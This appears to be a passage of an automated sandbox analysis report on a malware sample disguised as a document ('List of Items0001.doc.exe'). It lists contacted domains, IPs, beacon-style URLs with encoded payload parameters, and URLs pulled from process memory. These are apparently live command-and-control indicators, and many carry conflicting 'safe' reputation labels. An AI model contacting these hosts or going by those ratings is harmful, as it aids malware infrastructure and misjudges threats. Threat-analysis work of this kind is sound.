        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
        http://www.leadlikeyoumeanit.xyz/l390/0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
        http://www.mfgarage.net/xzdz/?7LY=x7lVHcpwtLz16okLmHbGfKRnF/5iwEEr5spHmAkItsijFFhieq0XEiVeqKHGapUsexCU+RCpmPC2tDMsopmhIEQEAKOTNNAbk8zRTxmj1zKzDn29d79Ldvk=&Nze=C0klVT0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svgm0%Avira URL Cloudsafe
        https://wns.windows.com/y0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/0%Avira URL Cloudsafe
        http://www.wdeb18.top/vacs/?7LY=Nw81+Usn0fanr8WCjEPwkk6RKTBWBdcWh3ZdisqFiDj5qtm6fUSc5UPRHiDGmrqRFt3sYIjXu/E976BkZ2ULyaZi6O7ym0jmurwAsFjcKbC3uyaytRFMIWQ=&Nze=C0klVT0%Avira URL Cloudsafe
        http://www.brainchainllc.online/__media__/js/trademark.php?d=brainchainllc.online&type=ns0%Avira URL Cloudsafe
        http://www.Brainchainllc.online0%Avira URL Cloudsafe
        https://assets.msn.com/weather0%Avira URL Cloudsafe
        http://www.brainchainllc.online/4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVT0%Avira URL Cloudsafe
        http://www.brainchainllc.online/Free_Makeup_Samples.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsV0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
        http://i.pki.goog/r1.crt00%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/0%Avira URL Cloudsafe
        http://www.new-wellness.net/tohg/0%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%Avira URL Cloudsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2F%3F7LY%3Dx7lVH0%Avira URL Cloudsafe
        http://www.52ywq.vip/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
        http://www.chalet-tofane.net/ytc6/0%Avira URL Cloudsafe
        https://www.google.com/favicon.ico0%Avira URL Cloudsafe
        https://6329.vhjhbv.com/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR0%Avira URL Cloudsafe
        https://cdn.jsdelivr.net/npm/bootstrap-icons0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
        http://www.brainchainllc.online/Free_Giveaways.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVQBFu00%Avira URL Cloudsafe
        http://www.brainchainllc.online/Free_Soap_Coupons.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVQB0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/10%Avira URL Cloudsafe
        https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
        http://www.tracy.club/clto/?7LY=Qp1XfCdsz8OJJJz3TLMvRPkoQesp985Iik5z4QR2yU8MVGcZykeEfqsbCV0TqEvKQ9KXAOYCUdjrGVGtx/egw088kz0UgyxAMHlR0NaM1s+K0msQl8MqjSQ=&Nze=C0klVT0%Avira URL Cloudsafe
        http://www.52ywq.vip/s4uc/0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
        http://www.chalet-tofane.net:80/ytc6/?Nze=C0klVT&amp;7LY=RYHehDtD4gH3OO31IF1CMhco/TkeBNw6MFMBy0%Avira URL Cloudsafe
        http://www.brainchainllc.online/sk-logabpstatus.php?a=dllsNHYvUDhjZEJYL2NwTFExWE1WdXllTFA1bTJkaDRkRE0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
        https://gemini.google.com/app?q=0%Avira URL Cloudsafe
        https://api.msn.coFo0%Avira URL Cloudsafe
        http://www.leadlikeyoumeanit.xyz/l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s=0%Avira URL Cloudsafe
        https://api.msn.com/X60%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=m0%Avira URL Cloudsafe
        https://htmlcodex.com0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
        https://dts.gnpge.com0%Avira URL Cloudsafe
        https://wamuk.org/f0%Avira URL Cloudsafe
        https://windows.msn.com/shell0%Avira URL Cloudsafe
        http://www.brainchainllc.online/__media__/design/underconstructionnotice.php?d=brainchainllc.online0%Avira URL Cloudsafe
        https://wamuk.org/j0%Avira URL Cloudsafe
        https://cdn.consentmanager.net0%Avira URL Cloudsafe
        http://www.wdcb30.top/opa3/0%Avira URL Cloudsafe
        https://wamuk.org/css/NxTelX253.bine0%Avira URL Cloudsafe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM0%Avira URL Cloudsafe
        http://www.rmgltd.services/0nxw/?Nze=C0klVT&7LY=VDKVBJOA/bMGRjznn6eSems8iPmcvcvRTGWcYhSAh5py0v568JrBANxwxTTdsJYxe+oQ5Y483kbsTgyvaPba2lIHlrlEYNvhYt1r/d+MJXUCRpniVK7bENg=0%Avira URL Cloudsafe
        http://inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9D0%Avira URL Cloudsafe
        http://www.moritynomxd.xyz/cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM=0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        https://api.msn.com/sports/blended?market=en-l0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
        http://www.prj81oqde1.buzz/dq8w/0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svg0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgz0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.onetoph.xyz
        		209.74.95.29
        		truetrue
          		unknown
          leadlikeyoumeanit.xyz
          		3.33.130.190
          		truetrue
            		unknown
            rmgltd.services
            		3.33.130.190
            		truefalseunknown
            wamuk.org
            		162.213.195.46
            		truefalseunknown
            chalet-tofane.net
            		62.149.128.40
            		truefalseunknown
            tracy.club
            		3.33.130.190
            		truefalseunknown
            wdcb30.top
            		206.119.82.131
            		truefalseunknown
            www.moritynomxd.xyz
            		172.81.61.224
            		truetrue
              		unknown
              xzwp.g.zxy-cname.com
              		13.76.137.44
              		truefalse
                		unknown
                www.new-wellness.net
                		134.119.247.136
                		truefalse
                  		unknown
                  www.brainchainllc.online
                  		208.91.197.27
                  		truefalse
                    		unknown
                    wdeb18.top
                    		206.119.82.147
                    		truefalseunknown
                    www.prj81oqde1.buzz
                    		154.212.219.2
                    		truefalseunknown
                    inf30027group23.xyz
                    		221.121.144.149
                    		truetrueunknown
                    www.mfgarage.net
                    		85.153.138.113
                    		truefalseunknown
                    www.useanecdotenow.tech
                    		unknown
                    		unknowntrueunknown
                    www.wdeb18.top
                    		unknown
                    		unknowntrueunknown
                    www.wdcb30.top
                    		unknown
                    		unknowntrue
                      		unknown
                      www.gerakankoreri.net
                      		unknown
                      		unknowntrue
                        		unknown
                        www.rmgltd.services
                        		unknown
                        		unknowntrue
                          		unknown
                          www.inf30027group23.xyz
                          		unknown
                          		unknowntrueunknown
                          www.leadlikeyoumeanit.xyz
                          		unknown
                          		unknowntrueunknown
                          www.52ywq.vip
                          		unknown
                          		unknowntrueunknown
                          www.tracy.club
                          		unknown
                          		unknowntrue
                            		unknown
                            www.chalet-tofane.net
                            		unknown
                            		unknowntrueunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DgSWw7bkgf2Hzd7TUNthqLIFQo8IeMSZ2DAN9PXR2KJtcXc92xKDXLKag=&Nze=C0klVTfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.leadlikeyoumeanit.xyz/l390/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mfgarage.net/xzdz/?7LY=x7lVHcpwtLz16okLmHbGfKRnF/5iwEEr5spHmAkItsijFFhieq0XEiVeqKHGapUsexCU+RCpmPC2tDMsopmhIEQEAKOTNNAbk8zRTxmj1zKzDn29d79Ldvk=&Nze=C0klVTfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.wdeb18.top/vacs/?7LY=Nw81+Usn0fanr8WCjEPwkk6RKTBWBdcWh3ZdisqFiDj5qtm6fUSc5UPRHiDGmrqRFt3sYIjXu/E976BkZ2ULyaZi6O7ym0jmurwAsFjcKbC3uyaytRFMIWQ=&Nze=C0klVTfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brainchainllc.online/4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVTfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.new-wellness.net/tohg/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.52ywq.vip/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVTfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.chalet-tofane.net/ytc6/true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tracy.club/clto/?7LY=Qp1XfCdsz8OJJJz3TLMvRPkoQesp985Iik5z4QR2yU8MVGcZykeEfqsbCV0TqEvKQ9KXAOYCUdjrGVGtx/egw088kz0UgyxAMHlR0NaM1s+K0msQl8MqjSQ=&Nze=C0klVTfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.52ywq.vip/s4uc/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.leadlikeyoumeanit.xyz/l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s=false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.wdcb30.top/opa3/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.rmgltd.services/0nxw/?Nze=C0klVT&7LY=VDKVBJOA/bMGRjznn6eSems8iPmcvcvRTGWcYhSAh5py0v568JrBANxwxTTdsJYxe+oQ5Y483kbsTgyvaPba2lIHlrlEYNvhYt1r/d+MJXUCRpniVK7bENg=false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.moritynomxd.xyz/cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM=false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.prj81oqde1.buzz/dq8w/false
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabTapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com/sp:explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchTapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.jsdelivr.net/npm/bootstrapTapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/pics/29590/bg1.png)TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microsoftList of Items0001.doc.exe, 00000003.00000003.674114777059.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043335164.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674043077042.0000000002354000.00000004.00000020.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com/v1/news/Feed/Windows?~explorer.exe, 00000009.00000000.677551987614.00000000091CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678895082217.00000000091CF000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000009.00000002.678908041013.000000000C2AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C2AB000.00000004.00000001.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.new-wellness.netMzAJhEkohQv.exe, 00000006.00000002.678884095238.0000000000694000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/explorer.exe, 00000009.00000000.677560796859.000000000C2DC000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDList of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gopher.ftp://ftp.List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.msn.com/sports/blended?market=en-us&satoriid=02bdexplorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svgmexplorer.exe, 00000009.00000002.678915551675.0000000010436000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677565828265.0000000010436000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://wns.windows.com/yexplorer.exe, 00000009.00000000.677567218626.0000000010806000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678917477894.0000000010806000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)TapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/weathermapdata/1/explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brainchainllc.online/__media__/js/trademark.php?d=brainchainllc.online&type=nsTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.Brainchainllc.onlineTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/weatherexplorer.exe, 00000009.00000000.677560796859.000000000C7F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C7F0000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brainchainllc.online/Free_Makeup_Samples.cfm?fp=w9FZG3e%2FPBub3ueojWcHgi4hSNkP9mT0Fk1ZvsVTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i.pki.goog/r1.crt0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.msn.com/weathermapdata/1/static/explorer.exe, 00000009.00000002.678890429546.0000000004D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677548939164.0000000004D72000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.rootca1.amazontrust.com/rootca1.crl0firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.rootca1.amazontrust.com0:firefox.exe, 00000008.00000003.674458839038.000001F76FB98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2F%3F7LY%3Dx7lVHTapiUnattend.exe, 00000005.00000002.677677825516.000000000548A000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000003C1A000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.678980575315.000000001614A000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nsis.sf.net/NSIS_ErrorErrorList of Items0001.doc.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.ecosia.org/newtab/TapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.google.com/favicon.icoTapiUnattend.exe, 00000005.00000002.677679921860.00000000082B8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://6329.vhjhbv.com/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwRTapiUnattend.exe, 00000005.00000002.677677825516.00000000047FA000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002F8A000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.00000000154BA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.jsdelivr.net/npm/bootstrap-iconsTapiUnattend.exe, 00000005.00000002.677677825516.0000000004668000.00000004.10000000.00040000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015328000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffTapiUnattend.exe, 00000005.00000002.677677825516.0000000004344000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677679657978.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678886920125.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.674506833850.000000002E064000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.677610450925.0000000015004000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
